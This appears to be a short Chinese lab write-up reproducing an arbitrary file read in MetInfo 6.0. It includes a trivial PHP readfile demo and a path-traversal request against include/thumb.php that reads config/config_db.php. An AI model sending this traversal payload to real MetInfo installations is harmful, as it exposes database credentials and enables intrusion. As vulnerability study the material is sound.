metinfo6.0-任意文件读取

1.1任意文件读取

建立好网站后

1.任意文件读取

从code新建php文件到www目录下

2.然后新建一个文件夹命名为1，在1文件夹下新建1.php文件


输入代码并保存

<？php
$fp = "../phpinfo.php"; （此处因为phpinfo。php在该目录的上级文件夹，所以输入。。/）
readfile($fp);
?>

打开网页，右键审查元素，成功读取到phpinfo文件

1.2meinfo_6.0.0_file-read

新建环境metino6.0环境

打开BP 输入 显示404

include.thumb.php //：include.thumb.php 是一个 PHP 文件，通常用于生成缩略图。该文件的主要功能是根据指定的参数生成并输出缩略图的图像数据。

在这里插入代码片
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/e40ea29d68e141a398774872aaf99d0c.png)
```
再试一下输点别的，读取一下别的敏感目录
?dir=.....///http/.....///config/config_db.php
还是无法读取。
![在这里插入图片描述](https://img-blog.csdnimg.cn/f1f4075cbb8a47d293ba7f06c525d9fe.png)
输入代码，成功读取
GET /Metinfo6.0.0/include/thumb.php?dir=http\..\..\config\config_db.php HTTP/1.1
![在这里插入图片描述](https://img-blog.csdnimg.cn/b541784deecc472bb3efe18ab0b918f2.png)